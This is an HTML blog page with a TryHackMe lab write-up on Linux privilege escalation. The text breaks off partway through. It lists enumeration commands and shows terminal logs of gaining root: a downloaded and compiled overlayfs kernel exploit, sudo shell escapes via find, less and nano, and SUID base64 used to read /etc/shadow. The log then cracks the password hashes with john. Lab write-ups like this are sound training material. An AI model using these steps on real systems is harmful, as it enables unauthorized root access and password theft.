<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="TryHackMe: Linux Privilege Escalation" />
<meta property="og:locale" content="en" />
<meta name="description" content="&lt;!– | sed ‘s/\S/*/g’" />
<meta property="og:description" content="&lt;!– | sed ‘s/\S/*/g’" />
<link rel="canonical" href="http://localhost:4000/posts/tryhackme-linux-privilege-escalation/" />
<meta property="og:url" content="http://localhost:4000/posts/tryhackme-linux-privilege-escalation/" />
<meta property="og:site_name" content="Joe Miller" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-07-03T00:00:00-07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="TryHackMe: Linux Privilege Escalation" />
<meta name="twitter:site" content="@" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-07-03T00:00:00-07:00","datePublished":"2023-07-03T00:00:00-07:00","description":"&lt;!– | sed ‘s/\\S/*/g’","headline":"TryHackMe: Linux Privilege Escalation","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/tryhackme-linux-privilege-escalation/"},"url":"http://localhost:4000/posts/tryhackme-linux-privilege-escalation/"}</script>
<!-- End Jekyll SEO tag -->


  <title>TryHackMe: Linux Privilege Escalation | Joe Miller
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Joe Miller">
<meta name="application-name" content="Joe Miller">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">
  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.25.0/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  
    <!-- Switch the mode between dark and light. -->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() {
      return 'mode';
    }
    static get MODE_ATTR() {
      return 'data-mode';
    }
    static get DARK_MODE() {
      return 'dark';
    }
    static get LIGHT_MODE() {
      return 'light';
    }
    static get ID() {
      return 'mode-toggle';
    }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener('change', () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }
          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();
      });
    } /* constructor() */

    get sysDarkPrefers() {
      return window.matchMedia('(prefers-color-scheme: dark)');
    }

    get isSysDarkPrefer() {
      return this.sysDarkPrefers.matches;
    }

    get isDarkMode() {
      return this.mode === ModeToggle.DARK_MODE;
    }

    get isLightMode() {
      return this.mode === ModeToggle.LIGHT_MODE;
    }

    get hasMode() {
      return this.mode != null;
    }

    get mode() {
      return sessionStorage.getItem(ModeToggle.MODE_KEY);
    }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      document.documentElement.removeAttribute(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage(
        {
          direction: ModeToggle.ID,
          message: this.modeStatus
        },
        '*'
      );
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }
        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }
      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.notify();
    } /* flipMode() */
  } /* ModeToggle */

  const modeToggle = new ModeToggle();
</script>

  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/profile.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <h1 class="site-title">
      <a href="/">Joe Miller</a>
    </h1>
    <p class="site-subtitle fst-italic mb-0"></p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://www.linkedin.com/in/jmillerinfosec/"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['joe','joemiller.io'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">
                Home
              </a>
            </span>

          
        
          
        
          
            
              <span>TryHackMe: Linux Privilege Escalation</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  

  
  

  




<!-- return -->




<article class="px-1">
  <header>
    <h1 data-toc-skip>TryHackMe: Linux Privilege Escalation</h1>

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        <!--Posted-->
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1688367600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jul  3, 2023
</time>

      </span>

      <!-- lastmod date -->
      

      <!-- tags -->
      
        <div class="post-tags">
          <i class="fa fa-tags fa-fw me-1"></i>
          
            <a
              href="/tags/write-up/"
              class="post-tag no-text-decoration"
            >write-up</a>
          
        </div>
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          <!--By-->

          <em>
            
              <!--<a href="">Joe Miller</a>-->
            
          </em>
        </span>

        <!-- read time -->

      </div>
      <!-- .d-flex -->
    </div>
    <!-- .post-meta -->
  </header>

  <div class="content">
    <!--
| sed 's/\S/\*/g'

<details>
<summary>
<figure class="highlight"><pre><code class="language-cmd" data-lang="cmd">...</code></pre></figure>
</summary>


<figure class="highlight"><pre><code class="language-cmd" data-lang="cmd">asdf2</code></pre></figure>


</details>

-->

<!--
> Example line for prompt.
{: .prompt-tip }
-->

<p><em><a href="https://tryhackme.com/room/linprivesc" target="_blank">https://tryhackme.com/room/linprivesc</a></em></p>

<h2 id="1-introduction"><span class="me-2">1 Introduction</span><a href="#1-introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Elements that may lead to privilege escalation include kernel version, installed applications, supported programming languages, and other users’ passwords.</p>

<h2 id="2-what-is-privilege-escalation"><span class="me-2">2 What is Privilege Escalation</span><a href="#2-what-is-privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Privilege escalation is the process of going from a lower permission account to a higher permission one. It can be accomplished through exploitation of a vulnerability, design flaw, or configuration oversight to gain unauthorized access to resources. It is important because initial access doesn’t typically come with administrative rights. Administrative rights are needed for resetting passwords, accessing protected data, editing configurations, enabling persistence, changing privileges, executing commands, etc.</p>

<h2 id="3-enumeration"><span class="me-2">3 Enumeration</span><a href="#3-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>The following commands might provide information about a system that could help lead to a privilege escalation exploit.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">hostname</code> hostname of the machine</li>
  <li><code class="language-plaintext highlighter-rouge">uname -a</code> information about the kernel</li>
  <li><code class="language-plaintext highlighter-rouge">cat /proc/version</code> information about the kernel, whether a compiler is installed</li>
  <li><code class="language-plaintext highlighter-rouge">cat /etc/issue</code> information about the OS</li>
  <li><code class="language-plaintext highlighter-rouge">ps aux</code> processes for all users, not attached to a terminal, include user that launched the process</li>
  <li><code class="language-plaintext highlighter-rouge">env</code> environmental variables</li>
  <li><code class="language-plaintext highlighter-rouge">sudo -l</code> commands the current user can run using sudo</li>
  <li><code class="language-plaintext highlighter-rouge">ls -la</code> hidden files</li>
  <li><code class="language-plaintext highlighter-rouge">id</code> current user’s privilege level and group memberships</li>
  <li><code class="language-plaintext highlighter-rouge">id frank</code> user frank’s privilege level and group memberships</li>
  <li><code class="language-plaintext highlighter-rouge">cat /etc/passwd</code> list of users on the system</li>
  <li><code class="language-plaintext highlighter-rouge">cat /etc/passwd | cut -d ":" -f 1</code> easier to read list of users on the system</li>
  <li><code class="language-plaintext highlighter-rouge">cat /etc/passwd | grep home</code> list of real users</li>
  <li><code class="language-plaintext highlighter-rouge">history</code> command history including possibly usernames/passwords</li>
  <li><code class="language-plaintext highlighter-rouge">ifconfig</code> give information about the networok interfaces of the system</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -a</code> show all listening ports and established connections</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -at</code> show all tcp connections</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -au</code> show all udp connections</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -l</code> list ports in listening mode</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -s</code> list network usage statistics by protocol</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -tp</code> list connections with the service name and PID information</li>
  <li><code class="language-plaintext highlighter-rouge">netstat -ano</code> display all sockets, do not resolve names, display timers</li>
  <li><code class="language-plaintext highlighter-rouge">find . -name flag1.txt</code> find the file named “flag1.txt” in the current directory</li>
  <li><code class="language-plaintext highlighter-rouge">find /home -name flag1.txt</code> find the file names “flag1.txt” in the /home directory</li>
  <li><code class="language-plaintext highlighter-rouge">find / -type d -name config</code> find the directory named config under “/”</li>
  <li><code class="language-plaintext highlighter-rouge">find / -type f -perm 0777</code> find files with the 777 permissions (files readable, writable, and executable by all users)</li>
  <li><code class="language-plaintext highlighter-rouge">find / -perm a=x</code> find executable files</li>
  <li><code class="language-plaintext highlighter-rouge">find /home -user frank</code> find all files for user “frank” under “/home”</li>
  <li><code class="language-plaintext highlighter-rouge">find / -mtime 10</code> find files that were modified in the last 10 days</li>
  <li><code class="language-plaintext highlighter-rouge">find / -atime 10</code> find files that were accessed in the last 10 day</li>
  <li><code class="language-plaintext highlighter-rouge">find / -cmin -60</code> find files changed within the last hour (60 minutes)</li>
  <li><code class="language-plaintext highlighter-rouge">find / -amin -60</code> find files accesses within the last hour (60 minutes)</li>
  <li><code class="language-plaintext highlighter-rouge">find / -size +50M</code> find files larger than 50MB</li>
  <li><code class="language-plaintext highlighter-rouge">find / -writable -type d 2&gt;/dev/null</code> Find world-writeable folders</li>
  <li><code class="language-plaintext highlighter-rouge">find / -perm -222 -type d 2&gt;/dev/null</code> Find world-writeable folders</li>
  <li><code class="language-plaintext highlighter-rouge">find / -perm -o w -type d 2&gt;/dev/null</code> Find world-writeable folders</li>
  <li><code class="language-plaintext highlighter-rouge">find / -perm -o x -type d 2&gt;/dev/null</code>  Find world-executable folders</li>
  <li><code class="language-plaintext highlighter-rouge">find / -name perl*</code> Find perl</li>
  <li><code class="language-plaintext highlighter-rouge">find / -name python*</code> Find python</li>
  <li><code class="language-plaintext highlighter-rouge">find / -name gcc*</code> Find gcc</li>
  <li><code class="language-plaintext highlighter-rouge">find / -perm -u=s -type f 2&gt;/dev/null</code> Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user</li>
  <li><code class="language-plaintext highlighter-rouge">find / -type f -perm -04000 -ls 2&gt;/dev/null</code> Find files that have SUID or SGID bits set</li>
</ul>

<p>This task involves using several of these commands to answer questions about the target system.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre></td><td class="rouge-code"><pre>karen@wade7363:/<span class="nv">$ </span><span class="nb">hostname
</span>wade<span class="k">****</span>

karen@wade7363:/<span class="nv">$ </span><span class="nb">uname</span> <span class="nt">-a</span>
Linux wade7363 3.<span class="k">**</span>.<span class="k">*</span>-<span class="k">**</span>-<span class="k">*******</span> <span class="c">#46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64</span>
GNU/Linux

karen@wade7363:/<span class="nv">$ </span><span class="nb">cat</span> /proc/version
Linux version 3.<span class="k">**</span>.<span class="k">*</span>-<span class="k">**</span>-<span class="k">*******</span> <span class="o">(</span>buildd@panlong<span class="o">)</span> <span class="o">(</span>gcc version 4.8.2 <span class="o">(</span>Ubuntu 4.8.2-19ubuntu1<span class="o">)</span> <span class="o">)</span> <span class="c">#46</span>
<span class="nt">-Ubuntu</span> SMP Thu Apr 10 19:11:08 UTC 2014

karen@wade7363:/<span class="nv">$ </span><span class="nb">cat</span> /etc/os-release
<span class="nv">NAME</span><span class="o">=</span><span class="s2">"Ubuntu"</span>
<span class="nv">VERSION</span><span class="o">=</span><span class="s2">"**.**, ****** ****"</span>
<span class="nv">ID</span><span class="o">=</span>ubuntu
<span class="nv">ID_LIKE</span><span class="o">=</span>debian
<span class="nv">PRETTY_NAME</span><span class="o">=</span><span class="s2">"Ubuntu **.** LTS"</span>
<span class="nv">VERSION_ID</span><span class="o">=</span><span class="s2">"**.**"</span>


karen@wade7363:/<span class="nv">$ </span>python <span class="nt">--version</span>
Python <span class="k">*</span>.<span class="k">*</span>.<span class="k">*</span>

karen@wade7363:/<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>karen<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>karen<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>karen<span class="o">)</span>

karen@wade7363:/<span class="nv">$ </span><span class="nb">cat</span> /etc/passwd | <span class="nb">grep </span>home
syslog:x:101:104::/home/syslog:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
saned:x:108:115::/home/saned:/bin/false
matt:x:1000:1000:matt,,,:/home/matt:/bin/bash
karen:x:1001:1001::/home/karen:

<span class="nv">$ </span>searchsploit linux kernel 3.13.0-24 <span class="nt">--cve</span> <span class="nt">--exclude</span><span class="o">=</span><span class="s2">"(PoC)|/dos/"</span>
Linux Kernel 3.13.0 &lt; 3.19 <span class="o">(</span>Ubuntu 12.04/14.04/14.10/15.04<span class="o">)</span> - <span class="s1">'overlayfs'</span> Local Privilege Escalation | linux/local/37292.c

<span class="nv">$ </span>searchsploit <span class="nt">-p</span> 37292
Exploit: Linux Kernel 3.13.0 &lt; 3.19 <span class="o">(</span>Ubuntu 12.04/14.04/14.10/15.04<span class="o">)</span> - <span class="s1">'overlayfs'</span> Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /opt/homebrew/opt/exploitdb/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-<span class="k">****</span>-<span class="k">****</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="4-automated-enumeration-tools"><span class="me-2">4 Automated Enumeration Tools</span><a href="#4-automated-enumeration-tools" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Automated tools may save time but might also miss some privilege escalation vectors.</p>
<ul>
  <li><a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS">LinPeas</a></li>
  <li><a href="https://github.com/rebootuser/LinEnum">LinEnum</a></li>
  <li><a href="https://github.com/mzet-/linux-exploit-suggester">LES (Linux Exploit Suggester)</a></li>
  <li><a href="https://github.com/diego-treitos/linux-smart-enumeration">Linux Smart Enumeration</a></li>
  <li><a href="https://github.com/linted/linuxprivchecker">Linux Priv Checker</a></li>
</ul>

<h2 id="5-privilege-escalation-kernel-exploits"><span class="me-2">5 Privilege Escalation: Kernel Exploits</span><a href="#5-privilege-escalation-kernel-exploits" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>The Linux kernel manages communication between components such as memory and applications. This requires the kernel to have specific privileges. A successful exploit will potentially lead to root privileges. To exploit the kernel; identify the kernel version, find an exploit for that kernel version. A failed kernel exploit can lead to a system crash.</p>

<p>This task involves using a kernel exploit to read a flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
</pre></td><td class="rouge-code"><pre>┌──(ealder㉿host1)-[~/Downloads]
└─$ sudo python3 -m http.server                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.69.129 - - [05/Jul/2023 17:44:26] "GET /37292.c HTTP/1.1" 200 -

karen@wade7363:/tmp$ wget 10.2.53.143:8000/37292.c
--2023-07-05 20:44:26--  http://10.2.53.143:8000/37292.c
Connecting to 10.2.53.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
Saving to: ‘37292.c’

100%[=========================================================================&gt;] 5,119 --.-K/s   in 0s      

2023-07-05 20:44:26 (514 MB/s) - ‘37292.c’ saved [5119/5119]

karen@wade7363:/tmp$ gcc -o ofs 37292.c

karen@wade7363:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# bash
root@wade7363:/tmp#

root@wade7363:/tmp# find / -name flag*txt             
/home/matt/flag1.txt

root@wade7363:/tmp# cat /home/matt/flag1.txt
THM-**************
</pre></td></tr></tbody></table></code></div></div>

<h2 id="6-privilege-escalation-sudo"><span class="me-2">6 Privilege Escalation: Sudo</span><a href="#6-privilege-escalation-sudo" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Use <code class="language-plaintext highlighter-rouge">sudo -l</code> to check the current user’s sudo permissions. Refer to <a href="https://gtfobins.github.io/" target="_blank">https://gtfobins.github.io/</a> for ways to escalate privileges when the current user has sudo rights to a particular application.</p>

<p>This task involves abusing sudo rights of the current user to escalate privileges and read a flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-9-126:/$ sudo -l
Matching Defaults entries for karen on ip-10-10-9-126:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karen may run the following commands on ip-10-10-9-126:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano

karen@ip-10-10-9-126:/$ find / -name "flag2.txt" 2&gt;/dev/null
/home/ubuntu/flag2.txt

karen@ip-10-10-9-126:/$ cat /home/ubuntu/flag2.txt
THM-*********

karen@ip-10-10-9-126:/$ sudo less -F /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::

karen@ip-10-10-9-126:/$ sudo nano /etc/shadow
[then copy paste from within nano]

karen@ip-10-10-9-126:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::

karen@ip-10-10-9-126:/$ sudo less /etc/profile
[within less: !/bin/sh]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::

sudo nano
[within nano: ctrl+R then ctrl+X then: reset; sh 1&gt;&amp;0 2&gt;&amp;0]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
</pre></td></tr></tbody></table></code></div></div>

<h2 id="7-privilege-escalation-suid"><span class="me-2">7 Privilege Escalation: SUID</span><a href="#7-privilege-escalation-suid" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>SUID (Set-user Identification) allows files to be executed with the permission level of the file owner. SGID (Set-group Identification) allows files to be executed with the permission level of the group owner. If a binary has the SUID bit set, it can potentially be used to access files inaccessible to the current user or to escalate privileges. Refer to <a href="https://gtfobins.github.io/" target="_blank">https://gtfobins.github.io/</a> for ways to escalate privileges when the current user can run a binary with the SUID bit set.</p>

<p>This task involves abusing a binary with the SUID bit set to escalate privileges and read a flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
</pre></td><td class="rouge-code"><pre>karen@ip-10-10-37-191:/$ find / -perm -u=s -type f 2&gt;/dev/null
...
/usr/bin/base64
...

karen@ip-10-10-37-191:/$ base64 /etc/shadow | base64 --decode
...
***********:$6$****************************************************************************************************:18796:0:99999:7:::
...

┌──(ealder㉿host1)-[~/Downloads]
└─$ unshadow passwd.txt shadow.txt  
...
***********:$6$****************************************************************************************************:1001:1001::/home/***********:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/ho
...

┌──(ealder㉿host1)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt   
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*********        (karen)     
*********        (user2)     
test123          (***********)     
3g 0:00:00:13 DONE (2023-07-06 00:47) 0.2248g/s 1324p/s 1861c/s 1861C/s paramedic..ellie123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.



karen@ip-10-10-52-126:/$ find / -name "flag3.txt" 2&gt;/dev/null
/home/ubuntu/flag3.txt
karen@ip-10-10-52-126:/$ cat /home/ubuntu/flag3.txt
cat: /home/ubuntu/flag3.txt: Permission denied
karen@ip-10-10-52-126:/$ base64 /home/ubuntu/flag3.txt | base64 --decode
THM-*******
</pre></td></tr></tbody></table></code></div></div>

<h2 id="8-privilege-escalation-capabilities"><span class="me-2">8 Privilege Escalation: Capabilities</span><a href="#8-privilege-escalation-capabilities" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Capabilities provides a way for sysadmins to manage privileges more granularly. Use <code class="language-plaintext highlighter-rouge">getcap -r / 2&gt;/dev/null</code> to list enabled capabilities. Refer to <a href="https://gtfobins.github.io/" target="_blank">https://gtfobins.github.io/</a> for ways to escalate privileges when the current user has enabled capabilities.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
